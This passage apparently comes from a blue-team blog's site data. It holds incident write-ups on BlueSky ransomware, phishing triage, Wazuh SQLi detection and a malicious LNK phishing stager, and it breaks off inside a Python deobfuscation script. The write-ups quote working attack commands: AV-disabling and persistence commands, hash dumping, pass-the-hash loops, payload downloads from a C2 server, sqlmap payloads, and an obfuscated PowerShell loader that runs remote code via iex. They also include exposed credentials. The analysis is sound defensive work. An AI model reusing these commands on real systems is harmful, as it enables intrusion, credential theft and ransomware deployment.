built line by line through xp_cmdshell echo redirects to read the base64 file, decode it, write the result to %TEMP%\\LkUYP.exe, and execute it silently, establishing a reverse shell:\nEXEC master..xp_cmdshell \u0026#39;echo Set ofs = CreateObject(\u0026#34;Scripting.FileSystemObject\u0026#34;) .OpenTextFile(\u0026#34;%TEMP%\\LkUYP.exe\u0026#34;, 2, True) \u0026gt;\u0026gt;%TEMP%\\Gjmwb.vbs \u0026amp; echo shell.run \u0026#34;%TEMP%\\LkUYP.exe\u0026#34;, 0, false \u0026gt;\u0026gt;%TEMP%\\Gjmwb.vbs ...\u0026#39;\nPrivilege escalation and persistence # After the reverse shell was established, the attacker escalated privileges by injecting a payload into winlogon.exe using msfconsole. 
Windows PowerShell Event ID 400 (engine state changed from None to Available), which marks the start of a new PowerShell host process, confirmed SYSTEM-level execution.\nPost-Exploitation # The attacker then downloaded a toolkit from http://87.96.21.84:\n- checking.ps1 — AV disabling + persistence\n- del.ps1 — kill monitoring tools + WMI cleanup\n- ichigo-lite.ps1 — hash dumping + lateral movement + ransomware staging\n- Invoke-PowerDump.ps1\n- Invoke-SMBExec.ps1\n- javaw.exe — BlueSky ransomware payload\nchecking.ps1 # Verified connectivity to http://87.96.21.84, then depending on privilege level executed one of two paths. With SYSTEM privileges it disabled Windows Defender via Set-MpPreference, stopped the WinDefend, MBAMService, and Sophos services, set exclusion paths for C:\\ProgramData\\Oracle and C:\\Windows, and modified Defender registry keys to prevent re-enabling. It then created a scheduled task \\Microsoft\\Windows\\MUI\\LPupdate running del.ps1 every four hours as SYSTEM, and invoked ichigo-lite.ps1:\nSet-MpPreference -DisableRealtimeMonitoring $true\nSet-MpPreference -ExclusionPath \u0026#34;C:\\ProgramData\\Oracle\u0026#34;\nGet-Service WinDefend | Stop-Service -Force\nC:\\Windows\\System32\\schtasks.exe /f /tn \u0026#34;\\Microsoft\\Windows\\MUI\\LPupdate\u0026#34; /tr \u0026#34;powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\del.ps1\u0026#34; /ru SYSTEM /sc HOURLY /mo 4 /create\nWithout elevation, a lower-privilege scheduled task was created under a name carrying a fake SID suffix to blend with system tasks (a genuine SID always starts with S-1-, so the S-3-5-21 revision is itself a giveaway):\nschtasks /create /tn \u0026#34;Optimize Start Menu Cache Files-S-3-5-21-...\u0026#34; /sc HOURLY /mo 3\ndel.ps1 # Removed all WMI event subscription bindings from root\\subscription, then killed monitoring and analysis tools to blind the defender:\nGet-WmiObject __FilterToConsumerBinding -Namespace root\\subscription | Remove-WmiObject\n\n$list = \u0026#34;taskmgr\u0026#34;,\u0026#34;perfmon\u0026#34;,\u0026#34;SystemExplorer\u0026#34;,\u0026#34;taskman\u0026#34;,\u0026#34;ProcessHacker\u0026#34;,\u0026#34;procexp64\u0026#34;,\u0026#34;procexp\u0026#34;,\u0026#34;Procmon\u0026#34;,\u0026#34;Daphne\u0026#34;\nforeach($task in $list) { stop-process -name $task -Force }\nstop-process $pid -Force\nichigo-lite.ps1 # Loaded Invoke-PowerDump and Invoke-SMBExec from the C2, then dumped NTLM hashes to C:\\ProgramData\\hashes.txt:\nInvoke-PowerDump | Out-File -FilePath \u0026#34;C:\\ProgramData\\hashes.txt\u0026#34;\nParsed the hash file for usernames and NTLM hashes, fetched a target host list from http://87.96.21.84/extracted_hosts.txt, and performed pass-the-hash lateral movement against each host via SMB:\nforeach ($targetHost in $hostsContent -split \u0026#34;`n\u0026#34;) {\n    Invoke-SMBExec -Target $targetHost -Username $username -Hash $password\n}\nFinally staged the ransomware payload:\n$blueUri = \u0026#34;http://87.96.21.84/javaw.exe\u0026#34;\n$downloadDestination = \u0026#34;C:\\ProgramData\\javaw.exe\u0026#34;\n$downloadSuccess = Download-FileFromURL -url $blueUri -destinationPath $downloadDestination\nIOCs # Network\n- Attacker C2: 87.96.21.84\n- http://87.96.21.84/del.ps1\n- http://87.96.21.84/ichigo-lite.ps1\n- http://87.96.21.84/Invoke-PowerDump.ps1\n- http://87.96.21.84/Invoke-SMBExec.ps1\n- http://87.96.21.84/extracted_hosts.txt\n- http://87.96.21.84/javaw.exe\nCredentials\n- sa:cyb3rd3f3nd3r$ — MSSQL sa account\nFiles\n- %TEMP%\\SBjzH.b64 — base64-encoded PE\n- %TEMP%\\LkUYP.exe — decoded reverse shell\n- %TEMP%\\Gjmwb.vbs — base64 decoder\n- C:\\ProgramData\\del.ps1\n- C:\\ProgramData\\hashes.txt — dumped NTLM hashes\n- C:\\ProgramData\\javaw.exe — BlueSky ransomware (SHA256: 3e035f2d7d30869ce53171ef5a0f761bfb9c14d94d9fe6da385e20b8d96dc2fb)\nScheduled Tasks\n- \\Microsoft\\Windows\\MUI\\LPupdate — runs del.ps1 every 4h as SYSTEM\n- Optimize Start Menu Cache Files-S-3-5-21-... 
— low-priv fallback\nMITRE ATT\u0026amp;CK # Technique ID Description Network Service Scanning T1046 TCP port scan Exploit Public-Facing Application T1190 MSSQL xp_cmdshell abuse Valid Accounts T1078 sa account authentication Command and Scripting: PowerShell T1059.001 multi-stage PS toolkit Obfuscated Files or Information T1027 base64-encoded PE + commands Disable or Modify Tools T1562.001 Defender disabled via registry + cmdlet OS Credential Dumping: NTLM T1003.002 Invoke-PowerDump → hashes.txt Lateral Movement: SMB/Pass-the-Hash T1550.002 Invoke-SMBExec with dumped hashes Scheduled Task Persistence T1053.005 LPupdate + fake cache task Boot or Logon: Winlogon Helper T1547.004 Winlogon registry modification Ingress Tool Transfer T1105 javaw.exe staged from C2 Data Encrypted for Impact T1486 BlueSky ransomware (javaw.exe) Attack Chain # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; Start([87.96.21.84Attacker]):::input --\u003e Scan[TCP Port Scan]:::exec subgraph Recon [Reconnaissance] Scan --\u003e Ports[Open: 445 139 135 5357 1433]:::exec end subgraph Initial_Access [Initial Access] Ports --\u003e SQLAuth[MSSQL Loginsa:cyb3rd3f3nd3r$]:::exec SQLAuth --\u003e XpCmd[Enable xp_cmdshell]:::exec XpCmd --\u003e Drop[Drop base64 PE%TEMP%\\SBjzH.b64]:::exec Drop --\u003e VBS[Gjmwb.vbs decoder→ LkUYP.exe]:::exec VBS --\u003e Shell((Reverse Shell)):::exec end subgraph Evasion [Defense Evasion] Shell --\u003e Checking[checking.ps1]:::exec 
Checking --\u003e DefOff[Disable DefenderSet-MpPreference + Registry]:::exec Checking --\u003e AVOff[Stop WinDefendMBAMService Sophos]:::exec Shell --\u003e DelPS[del.ps1]:::exec DelPS --\u003e WMI[Remove WMI Subscriptions]:::exec DelPS --\u003e Kill[Kill procexp taskmgrProcessHacker Procmon]:::exec end subgraph Persistence [Persistence] Checking --\u003e Task1[Schtask LPupdatedel.ps1 every 4h SYSTEM]:::exec Checking --\u003e Task2[Schtask fake cache namelow-priv fallback]:::exec Shell --\u003e Winlogon[Winlogon RegistryModification]:::exec end subgraph CredAccess [Credential Access \u0026 Lateral Movement] Shell --\u003e Ichigo[ichigo-lite.ps1]:::exec Ichigo --\u003e PowerDump[Invoke-PowerDump→ C:\\ProgramData\\hashes.txt]:::exec PowerDump --\u003e SMBExec[Invoke-SMBExecPass-the-Hash → extracted_hosts.txt]:::exec end subgraph Impact [Impact] Ichigo --\u003e Download2[Download javaw.exeC:\\ProgramData\\]:::exec Download2 --\u003e Ransom((BlueSky Ransomware)):::exec end ","date":"March 10, 2026","externalUrl":null,"permalink":"/investigations/cdef-bluesky-ransomware/","section":"","summary":"An attacker performed a port scan, exploited a Microsoft SQL Server via the sa account, enabled xp_cmdshell to drop and execute a base64-encoded payload, then deployed a multi-stage PowerShell toolkit to disable AV, dump NTLM hashes, perform lateral movement via SMB, and stage the BlueSky ransomware payload.","title":"CDEF-BlueSky Ransomware","type":"investigations"},{"content":"","date":"March 10, 2026","externalUrl":null,"permalink":"/tags/mssql/","section":"Tags","summary":"","title":"MSSQL","type":"tags"},{"content":" Email Containing Suspicious External Link # An inbound email was received by h.harris@thetrydaily.thm at 08:30:42 with the subject \u0026ldquo;Your Amazon Package Couldn\u0026rsquo;t Be Delivered – Action Required\u0026rdquo;. The sender address was urgents@amazon.biz — a domain that spoofs Amazon by substituting .com with .biz. 
The email body applied urgency pressure, threatening that the package would be returned within 48 hours, and included a shortened redirect link http://bit.ly/3sHkX3da12340 rather than any legitimate Amazon domain. No attachment was present.\nSeveral indicators confirm this is a phishing attempt: the sender domain is not amazon.com, the link is obfuscated via a URL shortener, and the message uses a classic urgency-based social engineering lure. The alert is classified as a True Positive — phishing email impersonating Amazon Delivery.\nAccess to Blacklisted External URL Blocked by Firewall # At 08:31:56 — approximately 70 seconds after the phishing email in alert 8815 arrived — the firewall triggered a block event originating from internal host 10.20.2.17:34257 attempting to reach 67.199.248.11:80 via http://bit.ly/3sHkX3da12340. The rule Blocked Websites matched and the connection was denied.\nThis event correlates directly with alert 8815: h.harris clicked the malicious bit.ly link from the fake Amazon email, and the firewall successfully blocked the outbound request before the destination was reached. The alert is classified as a True Positive — the firewall prevented the user from accessing the phishing payload. No compromise occurred, but the user interacted with the phishing email and requires awareness training.\nInbound Email Containing Suspicious External Link # At 08:33:00, c.allen@thetrydaily.thm received an email purportedly from no-reply@m1crosoftsupport.co with the subject \u0026ldquo;Unusual Sign-In Activity on Your Microsoft Account\u0026rdquo;. The sender domain m1crosoftsupport.co is a typosquat of Microsoft, replacing the letter i with 1. 
The email body claimed an unusual sign-in had been detected from Lagos, Nigeria (102.89.222.143, 2025-01-24 06:42) and directed the user to click https://m1crosoftsupport.co/login to review their account — a classic credential harvesting page disguised as a Microsoft security alert.\nCritically, the correlated firewall log at 08:34:09 shows that internal host 10.20.2.25:32653 successfully connected to 45.148.10.131:443 via https://m1crosoftsupport.co/login — the connection was allowed by the Allow-Internet rule. This confirms that c.allen clicked the link and reached the credential harvesting site approximately one minute after receiving the email. The domain was not present on the firewall blacklist at the time of access.\nThe alert is classified as a True Positive — an active phishing compromise is suspected. The user likely visited a credential harvesting page and may have submitted Microsoft account credentials. An immediate password reset for c.allen is recommended, together with revocation of the account\u0026rsquo;s existing sessions and refresh tokens (a password reset alone does not invalidate a session the attacker has already established), escalation to Tier 2 for account activity review, and retroactive blacklisting of m1crosoftsupport.co / 45.148.10.131.\n","date":"March 10, 2026","externalUrl":null,"permalink":"/blue_team/thm-phishing/","section":"","summary":"Three phishing campaigns were identified across four alerts: a legitimate HR onboarding email (false positive), a fake Amazon delivery notification whose bit.ly link was blocked by the firewall, and a Microsoft account spoofing email from m1crosoftsupport.co whose link was allowed through the firewall.","title":"THM-Phishing","type":"blue_team"},{"content":"","date":"March 9, 2026","externalUrl":null,"permalink":"/tags/wazuh/","section":"Tags","summary":"","title":"Wazuh","type":"tags"},{"content":" Objective # Investigate a SQL Injection attack detected by Wazuh and Suricata targeting a DVWA instance, triage alerts, identify the attack pattern and tooling, and configure automated response to block the attacker IP.\nEnvironment #\n- Attacker: Kali Linux, 192.168.248.129\n- Agent: Ubuntu 22.04 Server, 192.168.248.140\n- Wazuh manager: Ubuntu 24.04 Server, 192.168.248.50\nWhat Wazuh Detected # Wazuh generated 85 alerts from source IP 192.168.248.129 over approximately 2 minutes. The alert spike began at 15:47 UTC and corresponds to automated SQL Injection tooling activity. MITRE ATT\u0026amp;CK: T1190 - Exploit Public-Facing Application.\nSix rule IDs were triggered during the attack (rule ID, level, description, count):\n- 31103 (level 7): SQL injection attempt, 28\n- 31106 (level 6): A web attack returned code 200 (success), 20\n- 31171 (level 6): SQL injection attempt (SELECT/INSERT), 16\n- 31122 (level 5): Web server 500 error code (Internal Error), 16\n- 31152 (level 10): Multiple SQL injection attempts from same IP, 4\n- 31162 (level 10): Multiple web server 500 errors from same IP, 1\nRules 31103, 31106, 31171, and 31122 fire per individual event. Rules 31152 and 31162 are correlation rules that aggregate multiple events into a higher severity alert (level 10).\n- 16 HTTP 500 responses confirm injected payloads reached the database layer and caused query execution errors — a reliable error-based SQLi indicator.\n- 20 HTTP 200 responses on rule 31106 mean a portion of payloads executed successfully and the server returned data.\n- Rule 31152 (level 10) fired 4 times after the frequency threshold for repeated SQLi attempts from a single IP was reached.\nExpanded view of a single Rule 31103 alert:\n- Source IP: 192.168.248.129\n- Target: 192.168.248.140\n- URL: /dvwa/vulnerabilities/sqli/?id=1%27+UNION+SELECT+1%2C2--\u0026amp;Submit=Submit\n- HTTP status: 500\n- Tool: sqlmap/1.10.2#stable — confirmed via User-Agent header\n- Technique: Boolean-based blind SQLi with CASE WHEN and CHR() functions\n- MITRE: T1190 - Exploit Public-Facing Application\n- Fired times: 28\n{\n  \u0026#34;agent\u0026#34;: { \u0026#34;ip\u0026#34;: \u0026#34;192.168.248.140\u0026#34;, \u0026#34;name\u0026#34;: \u0026#34;agent1\u0026#34;, \u0026#34;id\u0026#34;: \u0026#34;001\u0026#34; },\n  \u0026#34;data\u0026#34;: {\n    \u0026#34;srcip\u0026#34;: \u0026#34;192.168.248.129\u0026#34;,\n    \u0026#34;id\u0026#34;: \u0026#34;200\u0026#34;,\n    \u0026#34;url\u0026#34;: \u0026#34;/dvwa/vulnerabilities/sqli/?id=1%27%20AND%204076%3D%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20CHR%28102%29%7C%7CCHR%2881%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%20FROM%20SYSIBM.SYSDUMMY1%29%3D%27fQzb%27%29%20THEN%204076%20ELSE%20%28SELECT%209431%20UNION%20SELECT%207597%29%20END%29%29--%20QdwI\u0026amp;Submit=Submit\u0026#34;\n  },\n  \u0026#34;rule\u0026#34;: {\n    \u0026#34;id\u0026#34;: \u0026#34;31103\u0026#34;,\n    \u0026#34;level\u0026#34;: 7,\n    \u0026#34;description\u0026#34;: \u0026#34;SQL injection attempt.\u0026#34;,\n    \u0026#34;firedtimes\u0026#34;: 28,\n    \u0026#34;mitre\u0026#34;: {\n      \u0026#34;technique\u0026#34;: [\u0026#34;Exploit Public-Facing Application\u0026#34;],\n      \u0026#34;id\u0026#34;: [\u0026#34;T1190\u0026#34;],\n      \u0026#34;tactic\u0026#34;: [\u0026#34;Initial Access\u0026#34;]\n    }\n  },\n  \u0026#34;full_log\u0026#34;: \u0026#34;192.168.248.129 - - [09/Mar/2026:14:17:26 +0000] \\\u0026#34;GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%204076%3D...--QdwI\u0026amp;Submit=Submit HTTP/1.1\\\u0026#34; 500 295 \\\u0026#34;http://192.168.248.140/dvwa/vulnerabilities/sqli/\\\u0026#34; \\\u0026#34;sqlmap/1.10.2#stable (https://sqlmap.org)\\\u0026#34;\u0026#34;,\n  \u0026#34;timestamp\u0026#34;: \u0026#34;2026-03-09T15:47:08.617+0000\u0026#34;\n}\nNote the offset between the Apache timestamp inside full_log (14:17:26) and the manager\u0026rsquo;s alert timestamp (15:47:08); agent and manager clocks, or the web server\u0026rsquo;s timezone setting, should be reconciled before the alert is placed on a timeline. The User-Agent string sqlmap/1.10.2#stable in the full log confirms the attack was conducted with sqlmap — no inference required. 
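To make the per-event and correlation logic concrete, here is an added Python example (my own code, not part of this write-up and not Wazuh's ruleset): it parses Apache combined-format lines like the full_log above, URL-decodes the request, applies simple SQLi patterns and a per-IP frequency threshold in the spirit of rules 31103 and 31152, and records which DBMS a probe is aimed at. The first two sample lines carry the two payloads shown on this page with the sqlmap User-Agent; the remaining lines, the second client IP 192.168.248.77, the pattern names and the threshold (3 hits within 60 seconds) are constructed for the example and are not Wazuh's real thresholds.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

# Apache combined log format, the layout of the full_log field above.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns matched against the URL-decoded request. Names are mine, not Wazuh rule names.
SQLI_PATTERNS = [
    ("union_select", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("boolean_case", re.compile(r"case\s+when", re.I)),
    ("chr_concat", re.compile(r"\bchr\s*\(", re.I)),
    ("tautology", re.compile(r"'\s*(?:and|or)\s+\d+\s*=", re.I)),
    ("comment_tail", re.compile(r"--|/\*")),
]

# Clues sqlmap embeds while probing for the backend DBMS (SYSIBM.SYSDUMMY1 is DB2's dummy table).
DBMS_CLUES = [
    ("SYSIBM.SYSDUMMY1", "DB2"),
    ("pg_sleep(", "PostgreSQL"),
    ("WAITFOR DELAY", "Microsoft SQL Server"),
    ("@@version", "MySQL or Microsoft SQL Server"),
]

# Constructed sample: lines 1-2 are the page's two payloads with the sqlmap UA; lines 3-5 are invented.
SAMPLE_LOG = """\
192.168.248.129 - - [09/Mar/2026:15:47:08 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+UNION+SELECT+1%2C2--&Submit=Submit HTTP/1.1" 500 295 "http://192.168.248.140/dvwa/vulnerabilities/sqli/" "sqlmap/1.10.2#stable (https://sqlmap.org)"
192.168.248.129 - - [09/Mar/2026:15:47:08 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%204076%3D%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20CHR%28102%29%7C%7CCHR%2881%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%20FROM%20SYSIBM.SYSDUMMY1%29%3D%27fQzb%27%29%20THEN%204076%20ELSE%20%28SELECT%209431%20UNION%20SELECT%207597%29%20END%29%29--%20QdwI&Submit=Submit HTTP/1.1" 500 295 "http://192.168.248.140/dvwa/vulnerabilities/sqli/" "sqlmap/1.10.2#stable (https://sqlmap.org)"
192.168.248.129 - - [09/Mar/2026:15:47:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D1--%20abcd&Submit=Submit HTTP/1.1" 200 4810 "http://192.168.248.140/dvwa/vulnerabilities/sqli/" "sqlmap/1.10.2#stable (https://sqlmap.org)"
192.168.248.129 - - [09/Mar/2026:15:47:10 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D2--%20abcd&Submit=Submit HTTP/1.1" 200 4702 "http://192.168.248.140/dvwa/vulnerabilities/sqli/" "sqlmap/1.10.2#stable (https://sqlmap.org)"
192.168.248.77 - - [09/Mar/2026:15:47:15 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4810 "http://192.168.248.140/dvwa/vulnerabilities/sqli/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"
"""


def parse_line(line):
    """Parse one combined-format line; returns None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    ev["decoded_url"] = unquote_plus(ev["url"])
    return ev


def classify(ev):
    """Per-event rules in the spirit of 31103 / 31106 / 31122: (level, description, pattern hits)."""
    alerts = []
    hits = [name for name, rx in SQLI_PATTERNS if rx.search(ev["decoded_url"])]
    if hits:
        alerts.append((7, "SQL injection attempt", hits))
        if ev["status"] == 200:
            alerts.append((6, "web attack returned code 200", hits))
    if ev["status"] == 500:
        alerts.append((5, "web server 500 error", []))
    return alerts


def dbms_probe(decoded_url):
    """Name the DBMS a fingerprinting payload targets, or None if no clue is present."""
    for clue, dbms in DBMS_CLUES:
        if clue.lower() in decoded_url.lower():
            return dbms
    return None


def analyze(log_text, threshold=3, window_s=60):
    """Per-event alerts plus a level-10 correlation alert each time `threshold` SQLi hits
    from one IP fall inside `window_s` seconds (a stand-in for 31152; the numbers are mine)."""
    events, correlated, recent = [], [], defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        alerts = classify(ev)
        if not alerts:
            continue
        events.append({
            "ip": ev["ip"], "ts": ev["ts"], "status": ev["status"],
            "decoded_url": ev["decoded_url"], "alerts": alerts,
            "tool": ev["ua"].split(" ")[0] if ev["ua"].lower().startswith("sqlmap") else None,
            "dbms_probe": dbms_probe(ev["decoded_url"]),
        })
        if any(level == 7 for level, _, _ in alerts):
            window = recent[ev["ip"]]
            window.append(ev["ts"])
            window[:] = [t for t in window if (ev["ts"] - t).total_seconds() <= window_s]
            if len(window) >= threshold:
                correlated.append({"ip": ev["ip"], "level": 10, "count": len(window), "at": ev["ts"]})
                window.clear()
    return {"events": events, "correlated": correlated}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for e in result["events"]:
        print(e["ip"], e["status"], e["tool"], e["dbms_probe"], [a[1] for a in e["alerts"]])
    print(result["correlated"])
```

The benign request from the second client produces no alert at all, the four sqlmap requests each produce a level-7 event (plus a level-6 or level-5 one depending on the status code), and the correlation alert fires on the third hit and then resets its window, which is why a long sqlmap run yields several level-10 alerts rather than one.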
The decoded URL payload reveals a boolean-based blind injection technique using CASE WHEN logic and CHR() character functions; the reference to SYSIBM.SYSDUMMY1 (the DB2 dummy table) marks this particular request as one of sqlmap\u0026rsquo;s DBMS fingerprinting probes.\nSuricata independently fingerprinted the source machine as Kali Linux via DHCP hostname at 15:44 UTC — before the web attack began — providing network-layer attribution unavailable from Apache logs alone.\nResponse # Active response was configured on the Wazuh Manager to automatically block the attacker IP via firewall-drop when rule 31152 triggers. Configuration added to /var/ossec/etc/ossec.conf:\n\u0026lt;active-response\u0026gt;\n  \u0026lt;command\u0026gt;firewall-drop\u0026lt;/command\u0026gt;\n  \u0026lt;location\u0026gt;local\u0026lt;/location\u0026gt;\n  \u0026lt;rules_id\u0026gt;31152\u0026lt;/rules_id\u0026gt;\n  \u0026lt;timeout\u0026gt;0\u0026lt;/timeout\u0026gt;\n\u0026lt;/active-response\u0026gt;\nfirewall-drop refers to the command of that name defined in the default ossec.conf, and location local means the drop rule is applied on the agent that raised the alert (here the DVWA host), not on the manager. timeout is set to 0, so the block is permanent: it is never undone automatically and requires manual review before removal. This is appropriate for a confirmed TP where the source IP shows no legitimate use case.\nConclusion # Wazuh successfully detected the SQL Injection attack out of the box, generating 85 alerts across 6 rule IDs. The attacker tool was confirmed directly from the User-Agent header (sqlmap/1.10.2#stable) without any inference. 
Correlation rules 31152 and 31162 fired automatically without custom configuration, and active response permanently blocked the attacker IP once the threshold was reached, without manual intervention.\n","date":"March 9, 2026","externalUrl":null,"permalink":"/blue_team/wazuh-injection/","section":"","summary":"Detected a SQL Injection attack, observed 85 alerts across 6 rule IDs, and configured automated IP blocking via active response.","title":"Wazuh + Suricata: injection detection","type":"blue_team"},{"content":" Difficulty: Easy OS: Windows Date: 2026-03-07 TL;DR # A phishing email impersonating an EU Health Logistics Office delivered a password-protected ZIP containing a malicious LNK file and a decoy PDF. The LNK executed an obfuscated PowerShell stager that opened the PDF as a distraction, collected system fingerprint data, checked in to health-status-rs.com, and fetched a next-stage implant from advent-of-the-relics-forum.htb.blue using hardcoded credentials svc_temp:SnowBlackOut_2026!.\nInitial Analysis # At Fri, 14 Nov 2025 20:33:15 a phishing email was sent from eu-health@ca1e-corp.org, a typosquat of the target\u0026rsquo;s own domain cale-corp.org (lowercase l swapped for the digit 1), to kamil.poltavez@cale-corp.org:\nFrom: EU Health Logistics Office \u0026lt;eu-health@ca1e-corp.org\u0026gt;\nTo: kamil.poltavez@cale-corp.org\nThe email contained an attached ZIP file:\nHealth_Clearance-December_Archive.zip\nThe email body contained two base64-encoded blobs — the first decoded to the email body text, the second to the ZIP archive itself. Decoding both revealed the archive password: Up7Pk99G.\nUnpacking the archive with the password yielded two files:\nEU_Health_Compliance_Portal.lnk\nHealth_Clearance_Guidelines.pdf\nStatic Analysis # Shortcut # The shortcut contained an obfuscated PowerShell one-liner. 
First, it opened the decoy PDF via saps .\\Health_Clearance_Guidelines.pdf (saps is the alias of Start-Process) to distract the victim while the payload executed in the background.\nThe script then collected a system fingerprint — $env:USERNAME, $env:USERDOMAIN, and MachineGuid from HKLM:\\SOFTWARE\\Microsoft\\Cryptography (read with gp, the Get-ItemProperty alias) — and POSTed it to https://health-status-rs.com/api/v1/checkin, receiving a session ID in response. Using the returned session ID, it fetched the next-stage implant from https://advent-of-the-relics-forum.htb.blue/api/v1/implant/cid=\u0026lt;id\u0026gt; and piped the response directly into Invoke-Expression for execution. The switches -nONi -nOp -eXeC bYPaSs are case-randomised forms of -NonInteractive -NoProfile -ExecutionPolicy Bypass, iwr and iex are the Invoke-WebRequest and Invoke-Expression aliases, and the backticks inside sap`s, i`wr and i`ex are no-ops that only serve to break simple string matching.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nONi -nOp -eXeC bYPaSs -cOmManD \u0026#34;\n$Bs = (-join(\u0026#39;Basic c3\u0026#39;,\u0026#39;ZjX3Rlb\u0026#39;,\u0026#39;XA6U2\u0026#39;,\u0026#39;5\u0026#39;,\u0026#39;vd0JsY\u0026#39;,\u0026#39;WNrT\u0026#39;,\u0026#39;3V\u0026#39;,\u0026#39;0X\u0026#39;,\u0026#39;zIwM\u0026#39;,\u0026#39;jYh\u0026#39;));sap`s .\\Health_Clearance_Guidelines.pdf;\n$AX=$env:USERNAME;$oM=[System.Uri]::UnescapeDataString(\u0026#39;https%3A%2F%2Fhealth%2Dstatus%2Drs%2Ecom%2Fapi%2Fv1%2Fcheckin\u0026#39;);\n$Bz=$env:USERDOMAIN;$Lj=[System.Uri]::UnescapeDataString(\u0026#39;https%3A%2F%2Fadvent%2Dof%2Dthe%2Drelics%2Dforum%2Ehtb%2Eblue%2Fapi%2Fv1%2Fimplant%2Fcid%3D\u0026#39;);\n$Mw=(gp HKLM:\\SOFTWARE\\Microsoft\\Cryptography).MachineGuid;\n$pP = @{u=$AX;d=$Bz;g=$Mw};\n$Zu=(i`wr $oM -Method POST -Body $pP).Content;$Hd = @{Authorization = $Bs };i`wr -Headers $Hd $Lj$Zu | i`ex;\u0026#34;\nThe authorization header was assembled from split string fragments, and the URLs were stored percent-encoded (including the hyphens and dots, %2D and %2E) to evade static detection. Decoded, the header contained hardcoded credentials:\nBasic c3ZjX3RlbXA6U25vd0JsYWNrT3V0XzIwMjYh -\u0026gt; svc_temp:SnowBlackOut_2026!\n
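The static deobfuscation described above can be done mechanically. The following Python script is an added example (my own code, not part of the original analysis): it removes the no-op backticks, concatenates the -join fragments, decodes the UnescapeDataString literals and base64-decodes the Basic header, then pulls out the URLs, credentials, aliases and fingerprint fields. The STAGER string is the one-liner recovered from the LNK, copied as-is; the alias table and all helper names are assumptions of the example.

```python
import base64
import re
from urllib.parse import unquote

# Constructed input for this example: the stager command line recovered from the LNK above,
# copied verbatim (backtick-split aliases, -join fragments and percent-encoded URLs included).
STAGER = r'''C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nONi -nOp -eXeC bYPaSs -cOmManD "
$Bs = (-join('Basic c3','ZjX3Rlb','XA6U2','5','vd0JsY','WNrT','3V','0X','zIwM','jYh'));sap`s .\Health_Clearance_Guidelines.pdf;
$AX=$env:USERNAME;$oM=[System.Uri]::UnescapeDataString('https%3A%2F%2Fhealth%2Dstatus%2Drs%2Ecom%2Fapi%2Fv1%2Fcheckin');
$Bz=$env:USERDOMAIN;$Lj=[System.Uri]::UnescapeDataString('https%3A%2F%2Fadvent%2Dof%2Dthe%2Drelics%2Dforum%2Ehtb%2Eblue%2Fapi%2Fv1%2Fimplant%2Fcid%3D');
$Mw=(gp HKLM:\SOFTWARE\Microsoft\Cryptography).MachineGuid;
$pP = @{u=$AX;d=$Bz;g=$Mw};
$Zu=(i`wr $oM -Method POST -Body $pP).Content;$Hd = @{Authorization = $Bs };i`wr -Headers $Hd $Lj$Zu | i`ex;"'''

# Alias table used for reporting (my own, limited to the aliases that occur in this stager).
ALIASES = {"saps": "Start-Process", "iwr": "Invoke-WebRequest",
           "iex": "Invoke-Expression", "gp": "Get-ItemProperty"}


def strip_backticks(ps: str) -> str:
    """A backtick between two letters is a no-op in PowerShell (sap`s == saps, i`ex == iex)."""
    return re.sub(r"(?<=[A-Za-z])`(?=[A-Za-z])", "", ps)


def resolve_joins(ps: str) -> str:
    """Replace (-join('a','b',...)) with the single string literal it evaluates to."""
    def joined(m):
        return "'" + "".join(re.findall(r"'([^']*)'", m.group(1))) + "'"
    return re.sub(r"\(-join\(([^)]*)\)\)", joined, ps)


def resolve_unescapes(ps: str) -> str:
    """Replace [System.Uri]::UnescapeDataString('...') with the decoded literal."""
    return re.sub(r"\[System\.Uri\]::UnescapeDataString\('([^']*)'\)",
                  lambda m: "'" + unquote(m.group(1)) + "'", ps)


def deobfuscate(ps: str) -> str:
    return resolve_unescapes(resolve_joins(strip_backticks(ps)))


def extract_iocs(ps: str) -> dict:
    """Return the deobfuscated script plus the indicators a triage note would list."""
    clean = deobfuscate(ps)
    urls = re.findall(r"'(https?://[^']+)'", clean)
    creds = [base64.b64decode(t).decode() for t in re.findall(r"'Basic ([A-Za-z0-9+/=]+)'", clean)]
    aliases = {a: ALIASES[a] for a in ALIASES if re.search(rf"\b{a}\b", clean)}
    fingerprint = sorted(set(re.findall(r"\$env:(\w+)", clean))) + re.findall(r"\.(MachineGuid)\b", clean)
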